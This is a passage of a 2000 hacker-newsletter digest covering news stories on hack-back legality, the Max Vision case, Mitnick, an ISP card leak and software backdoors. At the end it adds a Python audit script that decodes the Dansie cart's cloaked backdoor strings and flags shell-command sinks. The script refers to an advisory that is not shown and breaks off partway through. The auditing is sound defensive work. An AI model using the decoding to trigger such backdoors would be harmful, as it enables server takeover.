In addition, the techies by their actions had committed several federal
felonies for which hackers have gone to jail.
The simple truth is that it is illegal to disarm your online assailant.
Doing so requires that you take some offensive action - send out hostile
applets, return fire with your own denial-of-service tools or anything
else that will shut down the attack. The net effect is that both the
attacker and the victim (who is attacking back) are breaking the law.
At first glance, it doesn't make any sense: If you can disarm a
knife-wielding mugger, why can't you disarm your electronic mugger? But in
the physical world, you know who is mugging you. During the physical
attack there is a person with a knife, and while you may not know his name
or see his face, you are 100% sure that the knife you are taking away is
in the hands of a bad guy.
In the networked world, though, you cannot be sure the guy (IP address)
that seems to be attacking you is really the one attacking you. For
example, many of the zombie-based, distributed denial-of-service attacks
that occurred in February were traced back to benign networks which were
merely unwitting hosts to remote-triggered Trojans located on their
servers.
Hostile perimeter defense is a really tough problem, and right now the law
protects the bad guys more than the good guys. I don't have a perfect
solution to this conundrum, but a few thoughts do come to mind:
Let the industry design a set of hostile response tools that will stop an
attack, but minimize harm just in case a zombie is in the middle. Then,
legalize the use of these tools.
Legalize hostile responses, and zombie computers be damned if their
security is so bad that their networks can be compromised.
Build a hardened back-channel on the Internet which will provide fast
routing so that trace-back and bad-guy ID is easier, faster, and with the
cooperation of the ISP community, automatic.
Develop an Internet-based Caller ID system so that Web sites know who's
there, what they're doing and can ignore all anonymous requests.
Do nothing: Let the bad guys continue to win.
So in the spirit of the networked community, I'm asking readers to help
out: What do you think is a fair and efficient way of disarming online
assailants to protect your net?
Be creative, let loose; write laws or design technology. And send me your
ideas. Maybe together we can get something done.
@HWA
51.0 [HNN] More EZines Released
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by dave920
The second issue of HYPE has been released by Black Market Enterprises
featuring w00w00.org. HWA Hax0r News is up to issue number 52.
BME
HWA Hax0r News
http://www.b-m-e.com/features.hype.w00w00.html
http://www.csoft.net/~hwa/HWA-hn52.txt
@HWA
51.1 [IND] HYPE - w00w00 zine
~~~~~~~~~~~~~~~~~~~~~~~~
w00w00
by dave920
page 1 of 2
So I decided it was time to release HYPE : Issue 2. I sent notice to BME
Online's mailing list that I was looking for another candidate to honor
for their contributions, and sure enough I was contacted by an online
friend (that I've actually met in person as well): xm of geekmafia. He
suggested that I take a gander at w00w00.org, a web address that I had not
even heard of before. Since I didn't even recognize it, I decided that I
would follow his suggestion and see what w00w00 was all about.
I was welcomely surprised. I learned that this organization was one of the
largest of its type (which made me feel a bit inferior for not knowing
about them before this). w00w00 is a compilation of many things, mainly
focused on being a computer security forum, "where people could share
technical information and become involved with some of the top people in
the industry." I was immediately interested.
w00w00 is a very relaxed organization and always expanding. It grew
because there was nothing like it that preceded its existence. In the
words of shok, which I agree with tremendously, "w00w00 is a freedom and
not a restriction."
I contacted shok with my request to have w00w00 be the cover for this
issue of HYPE, and he agreed. The following is the interview that took
place.
w00w00 by dave920
page 2 of 2
dave920: What caused w00w00 to arise as an organization?
w00w00: Well, it was not intentionally created. However, the reason that
it succeeded, was the lack of technical security forums, where people
could share technical information and become involved with some of the top
people in the industry. w00w00 is serving as something of a Studio 54,
where acceptance into the group is based on technical knowledge and not
reputation. There are limitations to other forums such as Phrack, L0pht,
and BugTraq. Phrack is a zine, not a forum. L0pht serves a similar purpose
but has been "closed" to all but a small few. BugTraq is a moderated and
fairly uninteractive email forum. w00w00 is the only one offering
technical information on such a wide scale. All members have a very
different background (different areas of knowledge, different countries,
different languages, etc.).
What was the original focus of w00w00, and how has that changed since its
foundation?
At first we tried to keep things very technical. Over time, it became
relaxed and people published work when they felt like it. The group grew
tremendously as a result of it. w00w00 is a loose association, in that
people can continue to work where they do or affiliate with other groups.
w00w00 is a freedom and not a restriction.
How do you feel that your organization has benefitted the Internet
community? In the same regards, how has w00w00 benefitted from it?
We've offered a forum unparallel to any other for the security community.
We've allowed all kinds of people to get together for a common cause (very
similar to a security conference, but online and available 365 days a
year). Without the Internet, w00w00 wouldn't be possible, as we're
entirely Internet-based.
What specific steps have you taken to further the advancement of w00w00?
We intentionally went for diversity, so that each member could grow from
the others. We've always allowed bright people to get involved, and we've
had key involvements with other groups and companies to increase the
commonwealth of the group and share resources.
How has your understanding of the computer underground changed through the
development of w00w00?
Hmm, interesting question. I would say that it allows us to see the
computer security community from both a corporate (many members work for
large security firms) and a security group view, that large corporations
don't have access to. It's allowed us to interact with both sides. As far
as how it's changed our understanding, I can't say it has. What I would say
is that it brought the different understandings of different members and
merged them into a common one.
What would you say is the most significant accomplishment that w00w00 has
made?
Growing into not only the world's largest non-profit security
organization, but by far the most diverse in geographic distribution,
ethnic distribution, and technical distribution.
What do you plan for the future of your organization?
Continue to share information, continue to publish or work, and continue
to grow, grow, grow.
@HWA
52.0 [HNN] Max Vision Goes to Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by lseek99
After being hit with a fifteen count indictment last month Max Vision
(Max Butler) returned to court to hear the judge set the timetable for
the trial. Max Vision has been charged with interception of
communications, computer intrusion and possession of stolen passwords
in connection with cyber intrusions of Department of Defense computer
systems in the Spring of 1998. Max had created the open source catalog
of IDS signatures known as arachNIDS as well as maintained
whitehats.com.
Security Focus
http://www.securityfocus.com/news/18
"White Hat" Hacker in Court
Open source hacker "Max Vision" aided the FBI while allegedly cracking the
Pentagon.
By Kevin Poulsen
April 13, 2000 12:26 AM PT
A 27-year-old computer security expert and former FBI source returned to
federal court in San Jose, California Wednesday, where he stands accused
of penetrating a string of defense department and civilian computers.
Max Butler, known as "Max Vision" to friends and associates, was slammed
with a fifteen count indictment last month charging him with interception
of communications, computer intrusion and possession of stolen passwords
in connection with an alleged hacking spree in the Spring of 1998. At
Wednesday's appearance, Judge James Ware set a new date of May 8th for
laying down the timetable of deadlines and court appearances that lead to
trial.
Butler's indictment sent shockwaves through the close-knit community of
computer security experts who specialize in the arcane science of
intrusion detection - the careful analysis of Internet traffic for
"signatures" indicative of an attack. Butler is noted for creating and
maintaining arachNIDS, an open source catalog of attack signatures that
could be thought of as a clearinghouse of clues for Internet cybersleuths,
and is part of an overall public resource that Butler created at
WhiteHats.com.
In the parlance of hackers, "white hats" are ethical and law abiding --
distinguishable from "black hats" who crack computers without permission,
and "gray hats" who fall somewhere in between.
Martin Roesch, Director of Forensic Systems at network security startup
Hiverworld, says that until last month, there was no doubt what color
Butler's "hat" was. "He donated an immense amount of time to open source
security, and he did a hell of a job." says Roesch. "Everyone's using
arachNIDS."
Roesch recruited Butler to join
Hiverworld as Vulnerability Engineer, luring him away from the consulting
work and penetration testing he performed as Max Vision Network Security.
According to Hiverworld, Butler passed a background check, and was to
start work on March 21st. He didn't make it.
"The day he was supposed to start he said he was unable to come in... and
that he would catch up with me in a day or two," recalls Hiverworld CTO
David Cruickshank. "That night, I had fallen asleep with the TV on, and I
woke up when I heard his name on the news."
Known Vulnerability
Butler self-surrendered to authorities on March
21st, the day he was to begin his new job. He's charged with cracking
systems at McChord Air Force Base, NASA's Marshall Space Flight Center,
the Argonne and Brookhaven National Labs, IDSoftware, and an unspecified
Defense Department system. Another count alleges he unlawfully possessed
477 customer passwords from Aimnet, an ISP.
He pleaded not guilty, and was released on March 24th on $100,000 in
signature and property bonds posted by friends in the open source
community, a dozen of whom reportedly flocked to the courtroom in support
of Butler.
According to an FBI affidavit dated July 2nd, 1998, executed by agent
Peter Trahon of the Bureau's San Francisco Computer Crime Squad, the
investigation that led to Butler began in May of that year, when the
Defense Department began suffering a rash of intrusions exploiting a
"recently discovered" vulnerability in a common piece of software called
BIND.
The devastating security hole formally known as the "iquery BIND Buffer
Overflow vulnerability" was publicly announced by Carnegie Mellon's
Computer Emergency Response Team (CERT) on April 8th, 1998, by which time
a new version of BIND without the bug was available. But a month later,
according to the affidavit, hackers were still using it to crack Air Force
systems, nuclear laboratories, the U.S. Departments of Commerce,
Transportation and the Interior, as well as the National Institute of
Health.
According to the statement, on May 21st, 1998 an Air Force investigator
tracked an intruder from McChord Air Force Base back to a computer at Los
Angeles Community College, which proved to be a staging ground for BIND
buffer overflow attacks on military sites all around the country.
Connection logs obtained from the college under a court order led to a
particular Internet address at an ISP, where records obtained under a
second court order completed the trace to Max Butler's home telephone
number.
The telephone number was familiar to the FBI. "Max Butler is well known to
the [agents] of the Computer Crime Squad," the 1998 affidavit reads.
"Butler has been a confidential source... for the FBI for approximately 2
years. He has provided useful and timely information on computer crimes in
the past."
The affidavit notes that their source "has the ability to develop
techniques for, and commit, a sophisticated computer intrusion such as the
ones described herein."
"Hacker Witch-Hunt"
The FBI searched Butler's home on July 2nd,
1998. But according to his lawyer, the raid didn't stop the Computer Crime
Squad from returning to Butler for more help.
Defense attorney Jennifer Granick says her client's cooperation with the
FBI never involved informing on other people. "They used him for
technological help, and then they pressured him to do more than that, and
to do things he didn't want to do," says Granick. "They continued to seek
his assistance even after he became a suspect in this case." [Granick has
contributed to SecurityFocus.com.]
"The government then turns around in court and says he's dangerous and
he's a flight risk, even though they had continued to want to work with
him," says Granick, who declined to comment on other details of the case.
Assistant U.S. Attorney Ross Nadel -- Butler's prosecutor and the head of
Silicon Valley's "Computer Hacking and Intellectual Property" (CHIP) unit
-- didn't return phone calls Wednesday.
Butler is under advice from Granick not to speak to the press, and he
didn't answer an email inquiry. But in an April 3rd message to an
intrusion detection forum, Butler commented on what he termed the "frenzy
of the hacker witch-hunt."
"I am innocent until proven guilty and would appreciate the recognition of
this by our community," writes Butler, who also vows to continue his work
on open source security, though at a reduced capacity. "Due to my unusual
circumstances, the focus of my activities will shift to more professional
work and less pure research... I'll do what I can as the situation
allows."
Butler also railed against Hiverworld, which withdrew its employment offer
after learning of his indictment. "[T]he corporation expressed cowardice
that is deplorable. I can't tell you how disappointed I was to feel the
complete lack of support from the Hive," wrote Butler.
Hiverworld's Cruickshank says the company had no choice. "We're a security
start up that does intrusion detection and vulnerability scanning, so
having a person on staff who is under suspicion for major hacking
incidents is probably not the best idea in the world," says Cruickshank.
"As a security company," Cruickshank adds, "it's really important for us
to have white hats on board."
@HWA
53.0 [HNN] Mitnick On the Corporate Conference Circuit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Weld Pond
Kevin Mitnick is making the rounds of the corporate conference
circuit. In Salt Lake City next week he will lead a three-person panel
discussion on cyber security issues. He will join Rob Clyde, vice
president of security management at AXENT Technologies, Inc., and
Kelly White, senior consultant with Context Integration in a
discussion of cyber security issues.
PR Newswire - via Excite
http://news.excite.com/news/pr/000412/ut-uita-nettrends
Kevin Mitnick, Reformed Hacker, to Lead Cyber Security Panel at UITA's
NetTrends 2000
Information Security Experts to Give Utah Businesses a Wake-up Call
Updated 3:25 PM ET April 12, 2000
MIDVALE, Utah, April 12 /PRNewswire/ --
One of the most visible computer hackers in the world will be in Salt Lake
City next week to lead a three-person panel discussion on cyber security
issues. Kevin Mitnick has spent more than six of the last 20 years in jail
or prison for various technology related crimes. He was most recently
released from a medium-security federal prison in Lompoc, California after
being incarcerated for more than four years.
Next Wednesday Mitnick will join Rob Clyde, vice president of security
management at AXENT Technologies, Inc., and Kelly White, senior consultant
with Context Integration, in what is expected to be a free-wheeling panel
discussion on cyber security issues facing businesses and governments in
Utah and around the world.
The 75-minute cyber security panel discussion will be held from 1:00 p.m.
to 2:15 p.m. on Wednesday, April 19 at the Salt Palace Convention Center
in Salt Lake City. The panel discussion is part of a two-day event, April
19 and 20, produced by the Utah Information Technologies Association
called NetTrends 2000: The Digital Revolution.
"The Cyber Security panel will provide invaluable security information to
business leaders," said Richard Nelson, president and chief executive
officer of UITA. "Our panel of experts has nearly 50 years of combined
experience in information security. But what makes this panel truly unique
is the diversity of experience our panelists have. Rob has spent his
career creating computer security systems, Kelly has studied and tested
security systems and Kevin has built his expertise in circumventing these
systems. Together the three will discuss the real security issues facing
businesses today and the best solutions to effectively protect systems
from intrusion."
Mitnick is recognized by many as one of the most visible hackers in
history, including breaking into computer systems at some of the world's
largest corporations. As a reformed hacker, Mitnick's expert commentary
has been broadcast on CBS's 60 Minutes, CNN, Fox and CourtTV. In March
2000, he testified before the United States Senate in committee hearings
to explore ways to make computer systems safer from intruders.
As a founder of AXENT Technologies, Robert Clyde was a primary developer
of AXENT's original security management products and launched its security
consulting services. (AXENT is a provider of enterprise security solutions
for distributed computer environments.) Clyde has more than 20 years of
experience in security product development, management and consulting. He
has provided security consulting to Fortune 1000 companies and financial
institutions, advising CIOs and IT managers on how to solve security
problems at an enterprise level. Clyde is also a sought-after speaker at
security-related conferences.
Kelly White is a senior consultant with Context Integration, a provider of
business-to-business e-commerce solutions. Prior to joining Context
Integration, White was an Internet security specialist with Ernst & Young
LLP. As a security consultant, White conducted Internet attack and
penetration studies and designed Internet security architectures for
Fortune 1000 companies.
NetTrends 2000, Utah's premier IT conference, is focused on providing Utah
IT professionals with insights regarding today's best e-Business models,
future technologies and emerging trends. NetTrends 2000 will be held April
19-20 at the Salt Palace Convention Center in Salt Lake City, Utah.
NetTrends 2000 is a day and a half event running from 8:00 am to 4:00 p.m.
on April 19 and from 8:00 a.m. to 11:45 a.m. on April 20. The cost is $195
for UITA members and $295 for non-members. To register online, visit
www.uita.org or call Jennifer at 801-568-3500.
Utah Information Technologies Association is a non-profit organization
comprised of Utah information technology professionals dedicated to
providing services and events that enhance the growth of Utah's IT
community, consisting of over 2500 IT enterprises, through networking,
capital formation, skilled workforce development, positive media
recognition, public policy advocacy and marketing opportunities. For more
information about UITA or NetTrends 2000 visit www.uita.org or call
801-568-3500.
Contact: Richard Nelson of UITA, 801-568-3500, rnelson@uita.org; or David
Politis, dpolitis@politis.com, or Stephanie Dullum, sdullum@politis.com,
both of Politis Communications, 801-523-3730, for Utah Information
Technologies Association
@HWA
54.0 [HNN] AOL Liable for Music Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by root66
A German court has ruled that AOL Germany is liable for pirate music
held on its servers. The ruling stems from a case filed by Hit Box in
1998. AOL says it will appeal and that there is no technical way that
it can monitor all its content all the time.
USA Today
http://www.usatoday.com/life/cyber/tech/review/crh053.htm
04/12/00- Updated 11:45 AM ET
German court: AOL liable for music piracy
MUNICH, Germany (AP) - In a
ruling that could give the music industry a weapon against Internet
piracy, a court said Wednesday that America Online is responsible when
users swap bootleg music files on its service.
The case before a Bavarian state court in Munich originated with Hit Box
Software, a German company that sued AOL Germany for copyright violation
in 1998 after discovering that its digital music files were being
exchanged on the online service. An attorney for Hit Box, Stefan Ventroni,
hailed the ruling as an important step toward giving musicians better
protection against unauthorized use of their performances on the Internet.
''With this verdict, they can demand that such Internet pages be
blocked,'' he said.
AOL Germany said it would appeal. It argued that it lacks technical means
to monitor the service's huge data flow and that it had closed down the
forum where music was illegally swapped after learning of it.
''Total control of all pages on our servers is technically almost
impossible,'' said Alexander Adler, a spokesman for AOL Germany. ''Also,
that would amount to censorship.''
At issue were three instrumental versions of pop hits, including Get Down
by the Backstreet Boys, intended mainly for use as karaoke soundtracks.
Hit Box said each track, which normally costs up to $15 on a CD, was
downloaded for free more than 1,000 times via AOL.
Hit Box demanded about $50,000 in damages, but the court put off a ruling
on the size of the award.
Gema, Germany's main music licensing group, said the verdict was a signal
that Internet services need to introduce technologies to protect
copyrights online.
''The Internet is not a lawless space,'' spokesman Hans-Herwig Geyer said.
''Right now, the rights of creative artists are being trampled on in the
Internet.''
--------------------------------------------------------------------------------
Copyright 2000 Associated Press. All rights reserved. This material
may not be published, broadcast, rewritten or redistributed.
@HWA
55.0 [HNN] Canadian ISP Reveals Credit Card Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Chris
Look Communications (formerly Internet Direct) allowed a file
containing personal information on over 1,000 people, including credit
card numbers, to be accessible to anyone via the web. The file was in
place for over five days after the company was first notified before
it was removed.
Toronto Star
National Post
http://www.thestar.com/thestar/back_issues/ED20000411/news/20000411NEW03_CI-CREDIT.html
http://www.nationalpost.com/financialpost.asp?f
Star:
Credit card files turn up on the Net
Security breach at service provider
By Kerry Gillespie Toronto Star Staff Reporter
More than 1,000
confidential records - including credit card numbers - were accessible on
the Internet for at least five days because of a security breach at one of
Canada's largest service providers.
A man surfing the Internet stumbled on the file and notified Look
Communications, formerly Internet Direct, of their problem on April 5.
The file disappeared briefly, but returned and was still there last night
when The Star called.
Nearly three hours later, the file was gone.
``We're shutting the whole thing down now and, frankly, I'll shut down the
whole system if I have to,'' Gary Kawaguchi, a shaken senior
vice-president said last night.
He had no idea how the security breach occurred or why the company hadn't
managed to deal with it when first notified.
``This whole thing is going to prompt us to have a third party security
scan on everything we do,'' Kawaguchi said.
Look Communications has some 175,000 customers across the country. But
most of the addresses on the file were from Ontario.
The man who found the file and doesn't want his name used got in touch
with K. K. Campbell, a Star columnist who writes about the Internet for
the Fast Forward section, after the company failed to fix the problem.
``I've been writing about this for close to 10 years and I've never seen
one so close to home,'' Campbell said. It was Toronto Councillor Jack
Layton's name that first jumped out at him.
``That's a bit scary to think it's that easily accessible,'' Layton said,
when notified that an older credit card of his was on the list. ``I wonder
how many thousands of dollars in fraudulent transactions have gone on. The
company certainly owes people an explanation.''
Kawaguchi said they notified the credit card companies last night.
The list contained names of people who subscribed to Ipass, a global
roaming service for the Internet that allows users to pay local rates
instead of long distance charges.
Jacqueline Miller, a graduate student who does a lot of work abroad,
applied for the service to save money. While upset that her American
Express card number was out in the open, Miller wasn't surprised. When she
originally tried to sign up for the Ipass service over the Internet, the
screen told her it wasn't a secure Web site.
``So I did it all verbally by the phone, because I refused to use their
Web site,'' she said. ``I told them at the time, but they insisted `No, it
is secure.' ''
Chris Davis, an Internet security specialist, said he was shocked.
``Any of those people on that list could sue that company,'' said Davis,
CEO of HeXedit Network Security Inc., from his Ottawa home last night.
Credit card information is supposed to be sent from the user to the
company on a secure encrypted link, he said.
Once it reaches the company it is un-encrypted for use but should then be
destroyed.
@HWA
56.0 [HNN] Vatis Concerned About Spoofing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by acopalyse
Michael Vatis, director of the FBI's National Infrastructure
Protection Center, has said that spoofing makes it very difficult for
law enforcement to determine where an attack originates.
Vatis proposed two possible solutions: enable civilians not bound by
the Fourth Amendment to conduct investigations, or somehow defeat
spoofing with better technology.
Computer Currents
http://www.currents.net/newstoday/00/04/13/news4.html
@HWA
57.0 [HNN] L0pht Releases CRYPTOCard Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by Silicosis
L0pht Labs at @Stake has released an advisory regarding the Palm Pilot
implementation of CRYPTOCard, a software challenge/response user
authentication system. L0pht has found that the user's PIN can be
determined from the .PDB file stored on the Pilot. CRYPTOCard
Corporation has already provided a list of recommendations.
L0pht Labs at @Stake
Crypto Card Corporation
http://www.l0pht.com
http://www.cryptocard.com
@HWA
58.0 [HNN] Phone Companies Announce Security Initiative
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 13th
contributed by ts
Mobile phone companies Ericsson, Nokia, and Motorola have announced a
new initiative to secure online e-commerce via mobile phones by
creating an open global industry framework for more secure
transactions. The companies said that they would issue technical
bulletins about the initiative by the end of May.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2531636,00.html?chkpt
Cell phone giants in Net security pact
The world's top three mobile phone manufacturers teamed up to develop an
open, global industry framework for safer and simpler business over cell
phones.
By Kirstin Ridley, Reuters April 12, 2000 5:24 AM PT
LONDON -- The world's top three mobile phone manufacturers teamed up on
Tuesday in an attempt to secure the growth of e-commerce by developing an
open, global industry framework for safer and simpler business over cell
phones.
Dismissing concerns that current Internet-enabled phones are unsafe,
Sweden's Ericsson (Nasdaq: ERICY), Motorola (NYSE: MOT) of the United
States and Finland's Nokia (NYSE: NOK) called on industry peers to jump
aboard their initiative and ensure that customers can use mobile phones
for trusted, electronic transactions.
"A mobile device will be the platform to bridge the virtual and physical
worlds of e-business," said Matti Alahuhta, president of Nokia's mobile
phones division.
"Integrating security and transaction applications on a common core
standard and platform will create a global mass market for mobile
e-business," he added.
Encoding data sent over airwaves, establishing its authenticity, ensuring
confidentiality and preventing its unauthorized modification and use is
seen as vital to unleash the potential for a booming virtual business
world.
And the companies said the initiative is the key to ensure that growth
projections are met. Ericsson forecasts there will be around 1 billion
mobile telephone users and some 600 million mobile Internet subscribers
worldwide by 2004.
WAP phones need WIM
Alahuhta conceded that WAP (Wireless Application
Protocol) mobile phones, which allow Internet access, carry no guarantee
that transactions are being made by the phone's owner.
The answer lies partially in WAP security functions such as WTLS (Wireless
Transport Layer Security) and WIM (Wireless Identification Module), which
will act as a user ID for access to the Internet and offer the
authentication for e-business that cell phone Internet transactions
currently lack.
The three industry heavyweights said their initiative went further than
that of Radicchio, a 36-member consortium of technology and telecom firms
across Europe, the United States and Japan that has also called for more
secure mobile e-commerce.
Radicchio backs Finnish Sonera's technology solution, a so-called public
key infrastructure (PKI)-based framework, which could be used as a global
standard to ensure that any data sent is scrambled into a tough code to
make it hacker-proof.
Ericsson, Motorola and Nokia also hope to help set up an industry standard
for a digital signature that will provide the authentication -- ensuring
the identity of users -- that is necessary for secure mobile e-commerce.
"The mobile device can be a tool for a variety of services, such as
banking and trading services, credit card and payment services,
loyalty/bonus services, and ID-card services," the companies said.
"The aim is to offer solutions where security and payment services will be
integrated as a standard into hundreds of millions of mobile devices in
years to come."
The three companies said they would issue technical and other details
about the initiative by the end of May on their Web sites and hope to
formulate an open framework before the summer.
@HWA
59.0 [HNN] Microsoft Admits to Backdoor in Server Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by McIntyre
Microsoft has admitted that a secret password exists in its Internet
Server software. The backdoor, brought to light by Rain Forest Puppy,
could allow an intruder complete remote access to the system.
Microsoft recommends that the file dvwssr.dll be deleted from Internet
Server installations with Front Page extensions installed. The
password has been present in the code for at least three years and
Microsoft has said that it is conducting an internal investigation.
Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2543490,00.html
MS admits planting secret password
Microsoft engineers placed a password in server software that could be
used to gain illicit access to hundreds of thousands of Internet sites
worldwide.
By Ted Bridis, WSJ Interactive Edition UPDATED April 14, 2000 12:50 PM PT
Microsoft Corp. acknowledged Thursday that its engineers included in some
of its Internet software a secret password -- a phrase deriding their
rivals at Netscape as "weenies" -- that could be used to gain illicit
access to hundreds of thousands of Internet sites worldwide. The
manager of Microsoft's security-response center, Steve Lipner,
acknowledged the online-security risk in an interview Thursday and
described such a backdoor password as "absolutely against our policy" and
a firing offense for the as-yet-unidentified employees.
The company planned to warn customers as soon as possible with an e-mail
bulletin and an advisory published on its corporate Web site. Microsoft
(Nasdaq: MSFT) urged customers to delete the computer file--called
"dvwssr.dll"--containing the offending code. The file is installed on the
company's Internet-server software with Frontpage 98 extensions.
While there are no reports that the alleged security flaw has been
exploited, the affected software is believed to be used by many Web sites.
By using the so-called back door, a hacker may be able to gain access to
key Web-site management files, which could in turn provide a road map to
such things as customer credit-card numbers, said security experts who
discovered the password.
Two security experts discovered the rogue computer code -- part of which
was the denigrating comment "Netscape engineers are weenies!" -- buried
within the 3-year-old piece of software. It was apparently written by a
Microsoft employee near the peak of the hard-fought wars between Netscape
Communications Corp. and Microsoft over their versions of Internet-browser
software. Netscape later was acquired by America Online Inc.
One of the experts who helped identify the file is a professional security
consultant known widely among the Internet underground as "Rain Forest
Puppy." Despite his unusual moniker, he is highly regarded by experts and
helped publicize a serious flaw in Microsoft's Internet-server software
last summer that put hundreds of high-profile Web sites at risk of
intrusion.
Almost every Web-hosting provider
Russ Cooper, who runs the popular
NT Bugtraq discussion forum on the Internet, estimated that the problem
threatened "almost every Web-hosting provider."
"It's a serious flaw," Cooper said. "Chances are, you're going to find
some major sites that still have it enabled." Lipner of Microsoft said the
company will warn the nation's largest Web-site providers directly.
In an e-mail to Microsoft earlier Thursday, Rain Forest Puppy complained
that the affected code threatened to "improve a hacker's experience."
Experts said the risk was greatest at commercial Internet-hosting
providers, which maintain hundreds or thousands of separate Web sites for
different organizations.
Lipner said the problem doesn't affect Internet servers running Windows
2000 or the latest version of its server extensions included in Frontpage
2000.
The digital gaffe initially was discovered by a Europe-based employee of
ClientLogic Corp. (www.clientlogic.com) of Nashville, Tenn., which sells
e-commerce technology. The company declined to comment because of its
coming stock sale. The other expert, Rain Forest Puppy, said he was tipped
off to the code by a ClientLogic employee.
When asked about the hidden insult Thursday, Jon Mittelhauser, one of
Netscape's original engineers, called it "classic engineer rivalry."
@HWA
60.0 [HNN] Backdoor Found in E-Commerce Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by brian
Currently being used at over 200 e-commerce sites, Dansie Shopping
Cart contains code that allows the author to remotely enter the
system and run code on the server. The back door, discovered by
Blarg Online Services, allows someone to remotely enter the
server and issue commands to run CGI scripts. There has been no
response from Dansie in regard to the allegations.
Internet News
http://www.internetnews.com/ec-news/article/0,2171,4_340591,00.html
Shopping Cart Program Leaves Back Door Open
By Brian McWilliams
The developer of a highly-rated ecommerce shopping cart is accused of
building a software backdoor into the program that could give him or
hackers complete control of the server on which it's installed.
The Dansie Shopping Cart, which is currently in use at more than 200
e-commerce sites and is recommended by several Web hosting firms, contains
code that enables the author, Craig Dansie of Moreno Valley, Calif., to
potentially run any command on the Web server.
"He doesn't have the right to execute commands on our server without our
authorization. That is technically a hack, and he put it into his code
deliberately. It's unconscionable," said Joe Harris, a technical support
representative at Blarg Online Services in Seattle. Harris discovered the
hidden capability while helping a client install the Dansie Shopping Cart,
a CGI script written in the Perl language, and publicized his findings
earlier this week on the Bugtraq security mailing list.
According to Harris, Dansie built a subroutine into the cart which enables
him to use a nine-character form element or password to remotely execute
commands on the server using the broad security privileges usually
assigned to CGI scripts. But because the password is the same for every
installation of the cart, and because the script must be installed with
world-readable permission, anybody who has access to a server on which the
cart is installed could retrieve the source code and the form element and
use it to control other servers, according to Harris.
"It takes little imagination to dream up the potential havoc and privacy
violations this level of access could result in -- from stealing private
customer records to a full-blown crack of an e-commerce server," said
Harris.
Dansie did not respond to repeated requests for comment. The telephone
number listed in the domain record for dansie.net was disconnected
sometime Thursday. And a list of several hundred customers was removed
from the site Wednesday evening.
Licenses for the Dansie cart start at $150 and range up to $650 for the
mall version which can handle an unlimited number of merchants on the same
server.
According to Kasey Johns, Webmaster for Lonestar Badge and Sign of
Martindale, Texas, the backdoor in the Dansie cart appears to be a means
of protecting against unauthorized installations and of ensuring
compliance with the software's licensing terms, which specifically
prohibit modifying the source code. Johns said he learned of the backdoor
in late March while trying to debug an installation problem.
"I tried to make some changes to it, and basically he deleted the script
right off of my server. That just doesn't seem right," said Johns.
In an e-mail to Johns Wednesday, Dansie accused him of piracy and asserted
that "The software has a copyright protection feature that poses NO
security risk to your Web site or your Web server."
But Johns said Dansie's anti-piracy efforts are overzealous. "I want the
right to look at the code, make modifications, and not be locked into
whatever ghosts the author has hiding in there," said Johns.
According to Allan Knight, Webmaster for ValueWebHosting in Williamsville,
New York, which has over 60 hosting clients using the cart, Dansie
recently denied that the program passed information back to him. Knight,
who has been using the cart for three years, said Thursday he was not
aware that the script gave Dansie or others the ability to execute
arbitrary commands. But Knight said he had no plans to stop using the
software.
"I have never had any reason to shed any distrust on Craig whatsoever,"
said Knight.
While Dansie could issue a patch to customers to disable the backdoor,
Harris said prudent users will uninstall the software and find a new
shopping cart provider.
"His credibility is destroyed. Would you ever again trust anybody who did
this? Imagine if it had been Microsoft," Harris said.
http://www.dansie.net/cart.html
http://www.blarg.net/
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-04-08&msg=Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net
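The Bugtraq advisory reproduced below quotes the cart's `there2` substitution table and the path from an unvalidated `$FORM{...}` value into `system()` and a pipe `open`. As an added example (not code from the advisory, the article or the Dansie cart), this Python audit script decodes single-quoted literals passed to the cloaking routine and flags request parameters that reach shell sinks in a Perl CGI source. `SAMPLE` is constructed from the fragments the advisory quotes, with the trigger still masked, and the `%in` and `param()` taint sources are assumptions beyond what the page shows.

```python
import re
import string

# Substitution table copied from the `there2` routine quoted in the advisory:
#   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;  tr/_/-/;  tr/\@/\./;
# Outputs of one tr/// step are never inputs of a later one, so a single
# translation table is equivalent to the three sequential steps.
CLOAKED = string.ascii_lowercase + string.digits + "_@"
CLEAR = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth" + "-."
TABLE = str.maketrans(CLOAKED, CLEAR)


def there2(text):
    """Apply the cart's substitution to a cloaked string."""
    return text.translate(TABLE)


def decode_cloaked(source, routine="there2"):
    """Return (line_no, cloaked, clear) for every single-quoted literal
    passed to the cloaking routine. Interpolated arguments such as
    "@there2" are skipped because their value is only known at run time."""
    call = re.compile(r"&?\b%s\s*\(\s*'([^']*)'\s*\)" % re.escape(routine))
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for match in call.finditer(line):
            hits.append((line_no, match.group(1), there2(match.group(1))))
    return hits


# Request-controlled values. %FORM is the hash used in the advisory; %in
# (cgi-lib.pl) and param() (CGI.pm) are added here as assumptions.
TAINT = re.compile(r"\$(?:FORM|in)\{[^}]*\}|\bparam\s*\(")

# Places where a string is handed to a shell.
SINKS = [
    ("system/exec", re.compile(r"\b(?:system|exec)\s*\((.*)\)")),
    ("pipe open", re.compile(r'\bopen\s*\(\s*\w+\s*,\s*"(\|[^"]*|[^"]*\|)"')),
    ("backticks", re.compile(r"`([^`]*)`")),
]


def find_shell_sinks(source):
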